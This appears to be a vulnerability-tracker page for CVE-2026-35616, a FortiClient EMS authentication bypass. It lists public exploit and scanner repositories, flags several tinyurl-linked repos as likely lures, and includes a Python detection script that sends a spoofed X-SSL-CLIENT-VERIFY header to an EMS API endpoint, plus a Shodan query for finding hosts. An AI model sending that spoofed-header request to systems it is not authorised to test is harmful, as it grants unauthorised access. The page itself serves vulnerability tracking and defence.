CVE-2026-35616

CRITICAL · KEV · NUCLEI

Fortinet FortiClientEMS 7.4.5-7.4.6 - Improper Access Control (Authentication Bypass)

Title source: llm

Exploitation Summary

CVE-2026-35616 is actively exploited and listed in the CISA Known Exploited Vulnerabilities (KEV) catalog, added April 6, 2026. EIP tracks 11 public exploits from researchers including Alaatk, Hex0rc1st and jenniferreire26. A Nuclei detection template is also available. Note that several of the tracked repositories (jenniferreire26, jennydokumi30, z3r0h3ro) contain no code at all and point at a tinyurl.com download instead; treat those as lures rather than PoCs.

AI-analyzed exploit summary: This repository contains a functional Python exploit for CVE-2026-35616, an authentication bypass vulnerability in FortiClient EMS. The exploit forges a certificate and manipulates HTTP headers to bypass authentication and access protected API endpoints.

Description

An improper access control vulnerability (CWE-284) in Fortinet FortiClientEMS 7.4.5 through 7.4.6 may allow an unauthenticated attacker to execute unauthorized code or commands via crafted requests.

Exploits (11)

nomisec · WORKING POC · 2 stars
by Alaatk · remote
https://github.com/Alaatk/CVE-2026-35616

This repository contains a functional Python exploit for CVE-2026-35616, an authentication bypass vulnerability in FortiClient EMS. The exploit forges a certificate and manipulates HTTP headers to bypass authentication and access protected API endpoints.

Classification: Working PoC (95%)
Attack type: Auth bypass
Complexity: Moderate
Reliability: Reliable
Target: FortiClient EMS 7.4.5, 7.4.6
No auth needed
Prerequisites: Python 3 · requests · urllib3 · cryptography · openssl
devstral-2 · analyzed Apr 19, 2026
github · SUSPICIOUS
by jenniferreire26 · poc
https://github.com/jenniferreire26/CVE-2026-35616

The repository claims to exploit CVE-2026-35616 (which it mislabels as an unauthenticated stored XSS in Fortinet FortiClientEMS) but provides no actual exploit code. Instead, it directs users to an external download link (tinyurl.com), a common tactic for malicious or fake PoCs.

Classification: Suspicious (90%)
Attack type: XSS (as claimed by the repository)
Complexity: Theoretical
Reliability: Theoretical
Target: Fortinet FortiClientEMS 7.4.5-7.4.6
No auth needed
Prerequisites: none listed
devstral-2 · analyzed Jun 09, 2026
github · SUSPICIOUS
by jennydokumi30 · poc
https://github.com/jennydokumi30/CVE-2026-35616

The repository lacks actual exploit code and instead directs users to an external download link (tinyurl.com), a common tactic for distributing malware or fake exploits. The README provides minimal technical detail and reads more like a sales pitch.

Classification: Suspicious (95%)
Attack type: XSS (as labelled by the repository)
Complexity: Theoretical
Reliability: Theoretical
Target: Fortinet FortiClientEMS 7.4.5 through 7.4.6
No auth needed
Prerequisites: none specified
devstral-2 · analyzed May 31, 2026
github · STUB
by HORKimhab · poc
https://github.com/HORKimhab/CVE-2026-35616

The repository contains only placeholder files (README.md, LICENSE, .gitignore and a template file) with no actual exploit code or technical details about CVE-2026-35616. The README is a generic template with no specific information about the vulnerability.

Classification: Stub (95%)
Attack type: Other
Complexity: Theoretical
Reliability: Theoretical
Target: unknown
No auth needed
devstral-2 · analyzed May 28, 2026
nomisec · WORKING POC
by wa6n3r · infoleak
https://github.com/wa6n3r/CVE-2026-35616

This repository contains a functional exploit for CVE-2026-35616, which bypasses client-certificate chain validation in the FortiClient EMS API. The script automates the discovery of valid Common Names (CNs), forges a client certificate for one of them, and sends requests to protected endpoints using specific headers.

Classification: Working PoC (95%)
Attack type: Auth bypass
Complexity: Moderate
Reliability: Reliable
Target: Fortinet API (FortiClient EMS)
No auth needed
Prerequisites: Python 3.8+ · requests · cryptography · urllib3 · openssl (optional)
devstral-2 · analyzed Apr 21, 2026
nomisec · SCANNER
by keraattin · poc
https://github.com/keraattin/CVE-2026-35616

This repository contains a Python script that detects CVE-2026-35616, an improper access control vulnerability in FortiClient EMS 7.4.5-7.4.6. The script checks for authentication bypass by spoofing the X-SSL-CLIENT-VERIFY header and comparing HTTP responses.

Classification: Scanner (95%)
Attack type: Auth bypass
Complexity: Moderate
Reliability: Reliable
Target: FortiClient EMS 7.4.5, 7.4.6
No auth needed
Prerequisites: network access to target FortiClient EMS instance
devstral-2 · analyzed Apr 14, 2026
nomisec · SCANNER
by BishopFox · poc
https://github.com/BishopFox/CVE-2026-35616-check

This repository contains a non-destructive vulnerability scanner for CVE-2026-35616, an API authentication bypass in FortiClient EMS 7.4.5 and 7.4.6. The tool detects the vulnerability by comparing server responses to a baseline request and to a request carrying a spoofed HTTP header.

Classification: Scanner (100%)
Attack type: Auth bypass
Complexity: Trivial
Reliability: Reliable
Target: FortiClient EMS 7.4.5, 7.4.6
No auth needed
Prerequisites: Accessible FortiClient EMS web interface · Endpoint `/api/v1/fabric_device_auth/fortigate/init` exists
devstral-2 · analyzed Apr 07, 2026
nomisec · SCANNER
by fevar54 · poc
https://github.com/fevar54/CVE-2026-35616-detector.py

This repository contains a Python-based scanner that detects CVE-2026-35616, an improper access control vulnerability in FortiClient EMS versions 7.4.5 through 7.4.6. The tool checks for missing authentication on critical API endpoints and reports whether they are accessible without credentials.

Classification: Scanner (100%)
Attack type: Auth bypass
Complexity: Trivial
Reliability: Reliable
Target: FortiClient EMS 7.4.5 through 7.4.6
No auth needed
Prerequisites: network access to the target FortiClient EMS server
devstral-2 · analyzed Apr 07, 2026
nomisec · SUSPICIOUS
by z3r0h3ro · poc
https://github.com/z3r0h3ro/CVE-2026-35616-poc

The repository claims to provide an exploit for CVE-2026-35616 but lacks actual exploit code, instead directing users to an external download link (tinyurl.com). The README is vague and uses marketing language without technical detail.

Classification: Suspicious (95%)
Attack type: RCE (as claimed by the repository)
Complexity: Theoretical
Reliability: Theoretical
Target: FortiClient EMS 7.4.5 - 7.4.6
No auth needed
Prerequisites: Python 3.8+ · requests · pyyaml · argparse
devstral-2 · analyzed Apr 07, 2026
nomisec · SCANNER
by 0xBlackash · poc
https://github.com/0xBlackash/CVE-2026-35616

This repository contains a Nuclei template and a Python script designed to detect CVE-2026-35616, an authentication bypass vulnerability in FortiClient EMS. The tools perform safe checks by sending unauthenticated requests to sensitive API endpoints and analyzing the responses for indicators of vulnerability.

Classification: Scanner (95%)
Attack type: Auth bypass
Complexity: Trivial
Reliability: Reliable
Target: FortiClient EMS 7.4.5 through 7.4.6
No auth needed
Prerequisites: Network access to the target FortiClient EMS instance
devstral-2 · analyzed Apr 07, 2026
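The keraattin, BishopFox, fevar54 and 0xBlackash scanner entries above all describe the same non-destructive check: request a protected EMS API endpoint once with no credentials and once with a spoofed X-SSL-CLIENT-VERIFY header, then compare the two responses. The script below is an added example written for this page, not code from any of the repositories listed. It takes the `/api/v1/fabric_device_auth/fortigate/init` path from the BishopFox entry and the header name from the keraattin entry; everything else is an assumption and is marked as such: GET as the request method, `SUCCESS` as the header value a TLS-terminating proxy would set after a good client-certificate check (the nginx `$ssl_client_verify` convention), the example host name, and the `fake_ems` responders that stand in for vulnerable, patched and non-affected hosts so the check runs offline.

```python
"""Baseline-vs-spoofed-header check for CVE-2026-35616 (added example for this page).

Decision rule: report a host only when the endpoint is access-denied without the
header and 200 with it. Every other response pair gets a reason, not a hit.
"""
import ssl
import urllib.error
import urllib.request
from dataclasses import dataclass
from typing import Callable, Dict, Tuple

PROBE_PATH = "/api/v1/fabric_device_auth/fortigate/init"  # path named in the BishopFox entry
SPOOF_HEADER = "X-SSL-CLIENT-VERIFY"                       # header named in the keraattin entry
# Assumption: value a TLS-terminating proxy sets after a successful client-cert
# check (nginx's $ssl_client_verify convention). Adjust if your target differs.
SPOOF_VALUE = "SUCCESS"
USER_AGENT = "cve-2026-35616-check/0.1"

# A fetcher takes (url, headers) and returns (status, first bytes of body).
Fetcher = Callable[[str, Dict[str, str]], Tuple[int, str]]


def http_fetch(url: str, headers: Dict[str, str], timeout: float = 10.0) -> Tuple[int, str]:
    """Real transport. EMS hosts commonly present a self-signed certificate, so
    chain verification is disabled here; this is a scanner, not a client."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    req = urllib.request.Request(url, headers=headers, method="GET")  # assumption: GET
    try:
        with urllib.request.urlopen(req, timeout=timeout, context=ctx) as resp:
            return resp.status, resp.read(2048).decode("utf-8", "replace")
    except urllib.error.HTTPError as exc:          # 4xx/5xx still carry a status we need
        return exc.code, exc.read(2048).decode("utf-8", "replace")


@dataclass
class Verdict:
    baseline_status: int
    spoofed_status: int
    vulnerable: bool
    reason: str


def classify(baseline_status: int, spoofed_status: int) -> Verdict:
    """Turn the two status codes into a verdict. Only the gated->open flip counts."""
    gated = baseline_status in (401, 403)
    if baseline_status == 404 and spoofed_status == 404:
        return Verdict(baseline_status, spoofed_status, False,
                       "endpoint absent; probably not an affected build")
    if gated and spoofed_status == 200:
        return Verdict(baseline_status, spoofed_status, True,
                       "spoofed header flips access-denied to 200")
    if gated and spoofed_status in (401, 403):
        return Verdict(baseline_status, spoofed_status, False,
                       "header ignored or stripped upstream; patched or not exposed this way")
    if baseline_status == 200:
        return Verdict(baseline_status, spoofed_status, False,
                       "endpoint open even without the header; investigate separately")
    return Verdict(baseline_status, spoofed_status, False,
                   f"inconclusive pair {baseline_status}/{spoofed_status}")


def check_host(base_url: str, fetch: Fetcher = http_fetch) -> Verdict:
    """Send the baseline and spoofed requests to one host and classify them."""
    url = base_url.rstrip("/") + PROBE_PATH
    base_status, _ = fetch(url, {"User-Agent": USER_AGENT})
    spoof_status, _ = fetch(url, {"User-Agent": USER_AGENT, SPOOF_HEADER: SPOOF_VALUE})
    return classify(base_status, spoof_status)


def fake_ems(vulnerable: bool, present: bool = True) -> Fetcher:
    """Constructed stand-in for an EMS host so the check can run offline."""
    def fetch(url: str, headers: Dict[str, str]) -> Tuple[int, str]:
        if not present or not url.endswith(PROBE_PATH):
            return 404, "not found"
        if vulnerable and headers.get(SPOOF_HEADER) == SPOOF_VALUE:
            return 200, '{"status":"ok"}'
        return 403, '{"error":"forbidden"}'
    return fetch


if __name__ == "__main__":
    scenarios = [("vulnerable", fake_ems(True)),
                 ("patched", fake_ems(False)),
                 ("absent", fake_ems(False, present=False))]
    for label, fetch in scenarios:
        v = check_host("https://ems.example.invalid", fetch)   # constructed host name
        print(f"{label:>10}: vulnerable={v.vulnerable} "
              f"({v.baseline_status}->{v.spoofed_status}) {v.reason}")
```

To run against a real host, call `check_host("https://<ems-host>:<port>")` with the default transport. The point of the three-way split in `classify` is the caveat the scanner entries imply but do not spell out: an endpoint that answers 200 with and without the header tells you nothing about the header, and an identical denial on both requests can mean a patched build or a reverse proxy that strips the header before EMS sees it, so neither pair should be counted as a finding.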

Nuclei Templates (1)

FortiClient EMS - Authentication Bypass
Severity: HIGH · VERIFIED · by ritikchaddha
Shodan: http.favicon.hash:-800551065

Scores

CVSS v3 9.8
EPSS 0.3565
EPSS Percentile 97.2%
Attack Vector NETWORK
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CISA SSVC

Vulnrichment
Exploitation active
Automatable yes
Technical Impact total

Details

CISA KEV 2026-04-06
VulnCheck KEV 2026-04-04
ENISA EUVD EUVD-2026-18963
CWE: CWE-284 (Improper Access Control)
Status published
Products (3)
fortinet/forticlientems 7.4.5
fortinet/forticlientems 7.4.6
Fortinet/FortiClientEMS 7.4.5 - 7.4.6
Published Apr 04, 2026
KEV Added Apr 06, 2026
Tracked Since Apr 04, 2026